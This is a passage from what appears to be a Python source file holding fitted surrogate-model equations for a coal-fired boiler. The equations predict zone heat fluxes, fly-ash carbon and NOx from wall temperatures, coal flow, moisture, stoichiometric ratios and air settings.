-2.17805 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
+2186.86 * b.wall_temperature_waterwall[t, 6]*b.mf_H2O_coal_raw[t] \
-2.97757 * b.wall_temperature_waterwall[t, 6]*b.ratio_PA2coal[t] \
-0.0238492 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_waterwall[t, 11] \
+226.047 * b.wall_temperature_waterwall[t, 7]*b.SR[t] \
-1085.84 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
+0.236826 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 10] \
-2.73927 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+539.145 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-0.104024 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_roof[t] \
-291.787 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
+13.4721 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-124.929 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
-15.757 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
-4817.97 * b.wall_temperature_waterwall[t, 11]*b.SR[t] \
+1892.85 * b.wall_temperature_waterwall[t, 11]*b.SR_lf[t] \
+1.63258 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+2676.98 * b.wall_temperature_platen[t]*b.SR[t] \
+0.49742 * b.wall_temperature_platen[t]*b.secondary_air_inlet.temperature[t] \
-72.8604 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
+0.430275 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-310586 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-142967 * b.flowrate_coal_raw[t]*b.SR[t] \
+88449.6 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+217.961 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-7117.74 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+6.1753e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-3411.28 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-106414 * b.mf_H2O_coal_raw[t]*b.ratio_PA2coal[t] \
+845856 * b.SR[t]*b.SR_lf[t] \
+4202.28 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-340.792 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
-5.1335e-05 * (b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t])**2 \
-0.000310581 * (b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t])**2 \
+1.18396 * (b.wall_temperature_waterwall[t, 11]*b.SR[t])**2 \
-0.716778 * (b.wall_temperature_platen[t]*b.SR[t])**2 \
+11739 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-2422.02 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.000797508 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+16.1006 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
-0.0417793 * (b.wall_temperature_waterwall[t, 6]*b.mf_H2O_coal_raw[t])**3 \
+19.1183 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
12: "(220.386 * b.wall_temperature_waterwall[t, 1] \
+67.4508 * b.wall_temperature_waterwall[t, 2] \
-53.5201 * b.wall_temperature_waterwall[t, 3] \
+168.186 * b.wall_temperature_waterwall[t, 4] \
+164.298 * b.wall_temperature_waterwall[t, 5] \
+274.74 * b.wall_temperature_waterwall[t, 6] \
+159.494 * b.wall_temperature_waterwall[t, 7] \
+274.631 * b.wall_temperature_waterwall[t, 8] \
+589.546 * b.wall_temperature_waterwall[t, 9] \
+692.692 * b.wall_temperature_waterwall[t, 10] \
-125.502 * b.wall_temperature_waterwall[t, 11] \
+43494.6 * b.wall_temperature_waterwall[t, 12] \
-33880.3 * b.wall_temperature_platen[t] \
-9863.55 * b.wall_temperature_roof[t] \
+241200 * b.flowrate_coal_raw[t] \
+2.77276e+07 * b.mf_H2O_coal_raw[t] \
-2.88054e+06 * b.SR[t] \
+1.06869e+07 * b.SR_lf[t] \
-14610.7 * b.secondary_air_inlet.temperature[t] \
+172036 * b.ratio_PA2coal[t] \
+47797.2 * log(b.wall_temperature_waterwall[t, 1]) \
-11594.2 * log(b.wall_temperature_waterwall[t, 3]) \
-125501 * log(b.wall_temperature_waterwall[t, 4]) \
-144576 * log(b.wall_temperature_waterwall[t, 6]) \
-198449 * log(b.wall_temperature_waterwall[t, 7]) \
-221594 * log(b.wall_temperature_waterwall[t, 8]) \
-199032 * log(b.wall_temperature_waterwall[t, 9]) \
-258237 * log(b.wall_temperature_waterwall[t, 10]) \
-387498 * log(b.wall_temperature_waterwall[t, 11]) \
-1.13543e+07 * log(b.wall_temperature_waterwall[t, 12]) \
+8.627e+06 * log(b.wall_temperature_platen[t]) \
+3.05064e+06 * log(b.wall_temperature_roof[t]) \
-246256 * log(b.flowrate_coal_raw[t]) \
-79998 * log(b.mf_H2O_coal_raw[t]) \
+2.16333e+06 * log(b.SR[t]) \
-1.1065e+07 * log(b.SR_lf[t]) \
+4.91018e+06 * log(b.secondary_air_inlet.temperature[t]) \
-2.68698e+07 * exp(b.mf_H2O_coal_raw[t]) \
-23.3046 * b.wall_temperature_waterwall[t, 12]**2 \
+16.9006 * b.wall_temperature_platen[t]**2 \
+4.26692 * b.wall_temperature_roof[t]**2 \
+1231.98 * b.flowrate_coal_raw[t]**2 \
+4.60765 * b.secondary_air_inlet.temperature[t]**2 \
-20.1062 * b.flowrate_coal_raw[t]**3 \
-0.0208005 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_platen[t] \
+0.211335 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
+142.559 * b.wall_temperature_waterwall[t, 1]*b.SR[t] \
-0.708488 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
+0.104243 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-43.2466 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+84.0522 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
-0.097681 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 6] \
+0.168211 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
+0.0311415 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_platen[t] \
-201.961 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+0.0979395 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_platen[t] \
+152.533 * b.wall_temperature_waterwall[t, 7]*b.SR[t] \
+0.138216 * b.wall_temperature_waterwall[t, 8]*b.wall_temperature_waterwall[t, 12] \
+358.824 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-1.73455 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
-132.667 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
-0.128919 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_roof[t] \
-1.61439 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-51.0787 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
+0.415955 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
-109.65 * b.wall_temperature_waterwall[t, 11]*b.SR[t] \
+976.739 * b.wall_temperature_waterwall[t, 11]*b.SR_lf[t] \
-3.17061 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
-220.696 * b.wall_temperature_waterwall[t, 12]*b.SR[t] \
+31.6233 * b.wall_temperature_waterwall[t, 12]*b.ratio_PA2coal[t] \
+3.78535 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+2053.18 * b.wall_temperature_platen[t]*b.SR[t] \
+0.387234 * b.wall_temperature_platen[t]*b.secondary_air_inlet.temperature[t] \
-46.3757 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
+0.097768 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
+2.52659 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-249015 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-15466 * b.flowrate_coal_raw[t]*b.SR[t] \
+58532.1 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+121.404 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-3138.31 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+2.05815e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-164857 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-2532.86 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-861.46 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-209.784 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+0.00576341 * (b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t])**2 \
-0.000253398 * (b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t])**2 \
-0.592335 * (b.wall_temperature_platen[t]*b.SR[t])**2 \
+9328.86 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-2333.23 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
+3.15989e+06 * (b.mf_H2O_coal_raw[t]*b.SR[t])**2 \
+1.25506 * (b.SR[t]*b.secondary_air_inlet.temperature[t])**2 \
-0.000219682 * (b.wall_temperature_waterwall[t, 12]*b.SR_lf[t])**3 \
+14.8923 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
"pl": "(411941 * b.wall_temperature_waterwall[t, 1] \
+2599.73 * b.wall_temperature_waterwall[t, 2] \
-946.452 * b.wall_temperature_waterwall[t, 3] \
+3366.98 * b.wall_temperature_waterwall[t, 4] \
+208.286 * b.wall_temperature_waterwall[t, 5] \
+9022.67 * b.wall_temperature_waterwall[t, 6] \
+1152.84 * b.wall_temperature_waterwall[t, 7] \
+5576.24 * b.wall_temperature_waterwall[t, 8] \
+9303.39 * b.wall_temperature_waterwall[t, 9] \
+8901.32 * b.wall_temperature_waterwall[t, 10] \
+2840.75 * b.wall_temperature_waterwall[t, 11] \
-110147 * b.wall_temperature_waterwall[t, 12] \
+259512 * b.wall_temperature_platen[t] \
-54879.5 * b.wall_temperature_roof[t] \
+4.15488e+06 * b.flowrate_coal_raw[t] \
-3.15854e+07 * b.mf_H2O_coal_raw[t] \
-2.10085e+07 * b.SR[t] \
+1.70259e+08 * b.SR_lf[t] \
-34982.2 * b.secondary_air_inlet.temperature[t] \
+1.74171e+06 * b.ratio_PA2coal[t] \
-1.05527e+08 * log(b.wall_temperature_waterwall[t, 1]) \
-9.8091e+06 * log(b.wall_temperature_waterwall[t, 4]) \
-2.12136e+06 * log(b.wall_temperature_waterwall[t, 6]) \
-1.71391e+06 * log(b.wall_temperature_waterwall[t, 7]) \
-2.30845e+06 * log(b.wall_temperature_waterwall[t, 8]) \
-2.87745e+06 * log(b.wall_temperature_waterwall[t, 9]) \
-4.14628e+06 * log(b.wall_temperature_waterwall[t, 10]) \
+2.58819e+06 * log(b.wall_temperature_waterwall[t, 11]) \
+3.70654e+07 * log(b.wall_temperature_waterwall[t, 12]) \
+1.33648e+07 * log(b.wall_temperature_platen[t]) \
+1.645e+07 * log(b.wall_temperature_roof[t]) \
-2.78402e+06 * log(b.flowrate_coal_raw[t]) \
+1.22061e+08 * log(b.SR[t]) \
-1.80973e+08 * log(b.SR_lf[t]) \
+2.24892e+07 * log(b.secondary_air_inlet.temperature[t]) \
-256.702 * b.wall_temperature_waterwall[t, 1]**2 \
+44.0874 * b.wall_temperature_waterwall[t, 12]**2 \
-127.481 * b.wall_temperature_platen[t]**2 \
+22.8917 * b.wall_temperature_roof[t]**2 \
-1180.45 * b.flowrate_coal_raw[t]**2 \
+0.0704504 * b.wall_temperature_waterwall[t, 1]**3 \
-95.2406 * b.flowrate_coal_raw[t]**3 \
-3.57179e+08 * b.mf_H2O_coal_raw[t]**3 \
-1.32576 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 8] \
+0.503933 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 10] \
-2.70951 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
-6.71086 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
-2.22919 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 4] \
+0.766666 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-441.236 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+1018.32 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.631224 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_platen[t] \
+1.77501 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
+12571.3 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+0.0318959 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 12] \
-2.82968 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 12] \
-5.14737 * b.wall_temperature_waterwall[t, 6]*b.secondary_air_inlet.temperature[t] \
+10.3483 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+1588.54 * b.wall_temperature_waterwall[t, 7]*b.SR[t] \
-24.8692 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+4266.37 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-1.72834 * b.wall_temperature_waterwall[t, 9]*b.wall_temperature_roof[t] \
-20.1069 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
-1743.83 * b.wall_temperature_waterwall[t, 9]*b.SR[t] \
+72.025 * b.wall_temperature_waterwall[t, 9]*b.ratio_PA2coal[t] \
-21.9304 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-604.996 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
-0.803033 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
-25055.4 * b.wall_temperature_waterwall[t, 11]*b.SR[t] \
+15039.3 * b.wall_temperature_waterwall[t, 11]*b.SR_lf[t] \
-6.70118 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
+259.828 * b.wall_temperature_waterwall[t, 12]*b.ratio_PA2coal[t] \
-882.85 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+13754.4 * b.wall_temperature_platen[t]*b.mf_H2O_coal_raw[t] \
-264793 * b.wall_temperature_platen[t]*b.SR[t] \
+4.22028 * b.wall_temperature_platen[t]*b.secondary_air_inlet.temperature[t] \
-466.574 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
+1.01125 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+4891.17 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
+2.58075 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-2.74627e+06 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-600924 * b.flowrate_coal_raw[t]*b.SR[t] \
+688577 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+1399.54 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-32498.3 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+1.81724e+07 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-25011.8 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-26275 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-2285.29 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
+6.03477 * (b.wall_temperature_waterwall[t, 11]*b.SR[t])**2 \
+0.0812934 * (b.wall_temperature_waterwall[t, 11]*b.ratio_PA2coal[t])**2 \
+0.00133992 * (b.wall_temperature_platen[t]*b.flowrate_coal_raw[t])**2 \
+131.081 * (b.wall_temperature_platen[t]*b.SR[t])**2 \
+74778.6 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-18994.8 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
+3.50946e+07 * (b.mf_H2O_coal_raw[t]*b.SR[t])**2 \
+19.4424 * (b.SR[t]*b.secondary_air_inlet.temperature[t])**2 \
-0.0016092 * (b.wall_temperature_waterwall[t, 4]*b.SR[t])**3 \
-0.0295869 * (b.wall_temperature_platen[t]*b.SR[t])**3 \
+127.257 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
"roof": "(279.354 * b.wall_temperature_waterwall[t, 1] \
+142.292 * b.wall_temperature_waterwall[t, 2] \
-82.9421 * b.wall_temperature_waterwall[t, 3] \
+273.335 * b.wall_temperature_waterwall[t, 4] \
+892.852 * b.wall_temperature_waterwall[t, 5] \
+348.631 * b.wall_temperature_waterwall[t, 6] \
+1436.58 * b.wall_temperature_waterwall[t, 7] \
+905.29 * b.wall_temperature_waterwall[t, 8] \
+979.254 * b.wall_temperature_waterwall[t, 9] \
+1221.17 * b.wall_temperature_waterwall[t, 10] \
-688.783 * b.wall_temperature_waterwall[t, 11] \
+2284.85 * b.wall_temperature_waterwall[t, 12] \
-40634 * b.wall_temperature_platen[t] \
+34289.7 * b.wall_temperature_roof[t] \
+358502 * b.flowrate_coal_raw[t] \
+4.78726e+07 * b.mf_H2O_coal_raw[t] \
+4.59178e+07 * b.SR[t] \
+2.01021e+07 * b.SR_lf[t] \
-14947.3 * b.secondary_air_inlet.temperature[t] \
+317109 * b.ratio_PA2coal[t] \
+100628 * log(b.wall_temperature_waterwall[t, 1]) \
-259749 * log(b.wall_temperature_waterwall[t, 4]) \
-246590 * log(b.wall_temperature_waterwall[t, 6]) \
-442193 * log(b.wall_temperature_waterwall[t, 7]) \
-431568 * log(b.wall_temperature_waterwall[t, 8]) \
-441819 * log(b.wall_temperature_waterwall[t, 9]) \
-668967 * log(b.wall_temperature_waterwall[t, 10]) \
+1.31422e+06 * log(b.wall_temperature_waterwall[t, 11]) \
-1.2249e+06 * log(b.wall_temperature_waterwall[t, 12]) \
+1.01753e+07 * log(b.wall_temperature_platen[t]) \
-7.76406e+06 * log(b.wall_temperature_roof[t]) \
-168868 * log(b.flowrate_coal_raw[t]) \
-155788 * log(b.mf_H2O_coal_raw[t]) \
+3.56858e+06 * log(b.SR[t]) \
+1.09389e+07 * log(b.SR_lf[t]) \
+5.70227e+06 * log(b.secondary_air_inlet.temperature[t]) \
-4.72384e+07 * exp(b.mf_H2O_coal_raw[t]) \
+20.1487 * b.wall_temperature_platen[t]**2 \
-20.9093 * b.wall_temperature_roof[t]**2 \
+2180.83 * b.flowrate_coal_raw[t]**2 \
-9.65879e+06 * b.SR[t]**2 \
+4.36136 * b.secondary_air_inlet.temperature[t]**2 \
-33.3553 * b.flowrate_coal_raw[t]**3 \
-0.290778 * b.wall_temperature_waterwall[t, 1]*b.flowrate_coal_raw[t] \
+221.494 * b.wall_temperature_waterwall[t, 1]*b.SR[t] \
-1.07102 * b.wall_temperature_waterwall[t, 1]*b.secondary_air_inlet.temperature[t] \
+0.0884997 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
-56.5688 * b.wall_temperature_waterwall[t, 2]*b.ratio_PA2coal[t] \
+112.139 * b.wall_temperature_waterwall[t, 3]*b.SR[t] \
+0.228812 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_roof[t] \
-0.233352 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 8] \
-689.204 * b.wall_temperature_waterwall[t, 5]*b.SR_lf[t] \
+0.183533 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_platen[t] \
+2.40284 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+324.697 * b.wall_temperature_waterwall[t, 7]*b.SR[t] \
-1168.41 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
+492.766 * b.wall_temperature_waterwall[t, 8]*b.mf_H2O_coal_raw[t] \
-2.8134 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
+0.256616 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 11] \
-0.25843 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_roof[t] \
+19.2408 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
-138.355 * b.wall_temperature_waterwall[t, 10]*b.SR[t] \
-4483.2 * b.wall_temperature_waterwall[t, 11]*b.SR[t] \
+1985.73 * b.wall_temperature_waterwall[t, 11]*b.SR_lf[t] \
-3.09845 * b.wall_temperature_waterwall[t, 12]*b.flowrate_coal_raw[t] \
+60.349 * b.wall_temperature_waterwall[t, 12]*b.ratio_PA2coal[t] \
+3.7545 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+3376.5 * b.wall_temperature_platen[t]*b.SR[t] \
-81.1028 * b.wall_temperature_platen[t]*b.ratio_PA2coal[t] \
-10.9151 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
+638.803 * b.wall_temperature_roof[t]*b.mf_H2O_coal_raw[t] \
+0.212785 * b.wall_temperature_roof[t]*b.secondary_air_inlet.temperature[t] \
-388386 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
-55185.6 * b.flowrate_coal_raw[t]*b.SR[t] \
+84891 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
+226.151 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-8510.32 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
+3.64716e+06 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-4313.24 * b.mf_H2O_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
-4.91759e+07 * b.SR[t]*b.SR_lf[t] \
-2591.82 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
-343.32 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
-0.0526747 * (b.wall_temperature_waterwall[t, 9]*b.SR[t])**2 \
-0.000385934 * (b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t])**2 \
+1.16051 * (b.wall_temperature_waterwall[t, 11]*b.SR[t])**2 \
-0.947626 * (b.wall_temperature_platen[t]*b.SR[t])**2 \
+13089.9 * (b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t])**2 \
-3406.54 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-0.000648143 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2 \
+20.2802 * (b.flowrate_coal_raw[t]*b.ratio_PA2coal[t])**2 \
+5.86754e+06 * (b.mf_H2O_coal_raw[t]*b.SR[t])**2 \
+9.71079e+06 * (b.SR[t]*b.SR_lf[t])**2 \
+2.31621 * (b.SR[t]*b.secondary_air_inlet.temperature[t])**2 \
+22.1927 * (b.flowrate_coal_raw[t]*b.SR[t])**3)",
"flyash": "(exp(7.78102e-05 * b.wall_temperature_waterwall[t, 1] \
-7.54006e-05 * b.wall_temperature_waterwall[t, 2] \
-3.89992e-05 * b.wall_temperature_waterwall[t, 3] \
+0.000219719 * b.wall_temperature_waterwall[t, 4] \
-3.75494e-05 * b.wall_temperature_waterwall[t, 5] \
-0.000963424 * b.wall_temperature_waterwall[t, 6] \
-4.89079e-05 * b.wall_temperature_waterwall[t, 7] \
+0.000204467 * b.wall_temperature_waterwall[t, 8] \
-0.000143756 * b.wall_temperature_waterwall[t, 10] \
-0.000389332 * b.wall_temperature_waterwall[t, 11] \
-0.000338076 * b.wall_temperature_platen[t] \
+0.241386 * b.flowrate_coal_raw[t] \
+2.67141 * b.mf_H2O_coal_raw[t] \
+910.531 * b.SR[t] \
+115.082 * b.SR_lf[t] \
+0.00275081 * b.secondary_air_inlet.temperature[t] \
-0.10997 * b.ratio_PA2coal[t] \
-2.10237 * log(b.flowrate_coal_raw[t]) \
-535.077 * log(b.SR[t]) \
-36.5477 * log(b.SR_lf[t]) \
+90.074 * exp(b.SR[t]) \
-667.684 * exp(b.SR_lf[t]) \
-4.24234e-08 * b.wall_temperature_roof[t]**2 \
-0.00369243 * b.flowrate_coal_raw[t]**2 \
-317.41 * b.SR[t]**2 \
+865.673 * b.SR_lf[t]**2 \
+9.64582e-06 * b.flowrate_coal_raw[t]**3 \
-1.69795e-07 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 9] \
-2.65157e-07 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
+0.000163992 * b.wall_temperature_waterwall[t, 2]*b.SR[t] \
-2.36504e-07 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 8] \
+5.23042e-06 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
-0.000165057 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+5.85872e-08 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 11] \
+4.41736e-06 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
+4.67193e-07 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 11] \
+7.09971e-06 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
+6.36398e-07 * b.wall_temperature_waterwall[t, 6]*b.secondary_air_inlet.temperature[t] \
-2.41267e-07 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_waterwall[t, 8] \
+6.65347e-06 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+3.4501e-06 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+2.60247e-06 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
+4.71651e-06 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
+1.7254e-05 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+2.48343e-06 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
-0.0571714 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
+0.0921271 * b.flowrate_coal_raw[t]*b.SR[t] \
-0.233398 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
-6.86695e-05 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+0.000995532 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
-0.58226 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-0.00447073 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+0.000246125 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
-2.22952e-10 * (b.wall_temperature_platen[t]*b.flowrate_coal_raw[t])**2 \
+1.80036e-06 * (b.wall_temperature_platen[t]*b.mf_H2O_coal_raw[t])**2 \
-0.000659596 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
+0.00333862 * (b.flowrate_coal_raw[t]*b.SR_lf[t])**2 \
+1.22954e-09 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2))",
"NOx": "(-0.00436267 * b.wall_temperature_waterwall[t, 1] \
-0.0254073 * b.wall_temperature_waterwall[t, 2] \
+0.0510658 * b.wall_temperature_waterwall[t, 3] \
-0.0639424 * b.wall_temperature_waterwall[t, 4] \
-0.172523 * b.wall_temperature_waterwall[t, 5] \
-0.000482641 * b.wall_temperature_waterwall[t, 6] \
+0.355125 * b.wall_temperature_waterwall[t, 7] \
+0.00348034 * b.wall_temperature_waterwall[t, 8] \
-0.97655 * b.wall_temperature_waterwall[t, 9] \
+1.31514 * b.wall_temperature_waterwall[t, 10] \
+0.0262232 * b.wall_temperature_waterwall[t, 11] \
-0.169549 * b.wall_temperature_waterwall[t, 12] \
-0.000935994 * b.wall_temperature_platen[t] \
-0.187802 * b.wall_temperature_roof[t] \
-285.589 * b.flowrate_coal_raw[t] \
+3715.18 * b.mf_H2O_coal_raw[t] \
+4412.39 * b.SR[t] \
+3191.45 * b.SR_lf[t] \
-2.80808 * b.secondary_air_inlet.temperature[t] \
-29.6263 * b.ratio_PA2coal[t] \
-8.19895 * log(b.wall_temperature_waterwall[t, 7]) \
-632.752 * log(b.wall_temperature_waterwall[t, 10]) \
-154.422 * log(b.flowrate_coal_raw[t]) \
-286.045 * log(b.SR[t]) \
+2.8111 * b.flowrate_coal_raw[t]**2 \
-2.51074e-07 * b.wall_temperature_waterwall[t, 10]**3 \
+1290.32 * b.SR_lf[t]**3 \
+7.41824e-05 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 4] \
+0.00014509 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 12] \
+0.000150378 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_roof[t] \
+0.0248537 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
-0.353374 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
+1.00281 * b.wall_temperature_waterwall[t, 9]*b.SR_lf[t] \
-1.81866e-05 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
-0.279407 * b.wall_temperature_waterwall[t, 10]*b.mf_H2O_coal_raw[t] \
+0.000775333 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
